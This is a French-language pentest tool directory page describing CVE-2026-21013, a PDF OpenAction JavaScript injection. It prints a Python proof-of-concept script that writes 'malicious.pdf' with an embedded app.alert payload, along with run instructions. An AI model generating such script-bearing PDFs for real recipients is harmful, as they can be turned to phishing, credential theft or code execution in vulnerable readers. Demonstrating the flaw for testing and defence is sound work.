Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
Outils/GitHubGitHub/george0papasotiriou/cve-2026-21013-pdf-javascript-injection-via-embedded-script
Génération de PayloadsAnalyse des VulnérabilitésExploitationSécurité Web
GitHubgeorge0papasotiriou/cve-2026-21013-pdf-javascript-injection-via-embedded-script

CVE-2026-21013-PDF-JavaScript-Injection-via-Embedded-Script

Génère un PDF avec JavaScript intégré pour démontrer CVE-2026-21013, une injection OpenAction conduisant à l'exécution de scripts dans les lecteurs PDF vulnérables.

Voir le dépôt
2il y a 1 moisPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

CVE-2026-21013 – Injection JavaScript dans un PDF via un script intégré

Code du programme (Python générant un PDF malveillant)

root@kitploit:~
# generate_pdf_js_inject.py - Creates a PDF with embedded JavaScript
pdf = b"""%PDF-1.7
1 0 obj
<< /Type /Catalog /OpenAction << /S /JavaScript /JS (app.alert('XSS')) >>
>>
endobj
trailer
<< /Root 1 0 R >>
%%EOF
"""
with open("malicious.pdf", "wb") as f:
    f.write(pdf)
print("malicious.pdf created. When opened in a vulnerable PDF reader, it will execute JavaScript.")

CVE-2026-21013 – Injection JavaScript dans un PDF via OpenAction

Severity: Medium

Présentation

Un générateur de PDF ne neutralise pas le contenu fourni par l’utilisateur avant de l’intégrer dans le fichier PDF. Un attaquant peut injecter une entrée JavaScript qui s’exécute à l’ouverture du document, conduisant à du cross-site scripting (dans les visionneuses web) ou à une exécution de code locale (dans les lecteurs de bureau avec prise en charge complète de JavaScript).

/OpenAction

Détails de la vulnérabilité

  • Type : Injection PDF / Exécution de code côté client
  • Impact : Hameçonnage, vol d’identifiants, distribution de logiciels malveillants.
  • Cause racine : La bibliothèque PDF intègre directement les chaînes contrôlées par l’attaquant dans la structure PDF sans échappement ni validation.

Démonstration de l’exploit

Exécutez le générateur :

root@kitploit:~
python generate_pdf_js_inject.py

Ouvrez le fichier malicious.pdf résultant dans un lecteur PDF prenant en charge JavaScript ; une boîte de dialogue d’alerte apparaîtra.

Télécharger l’outil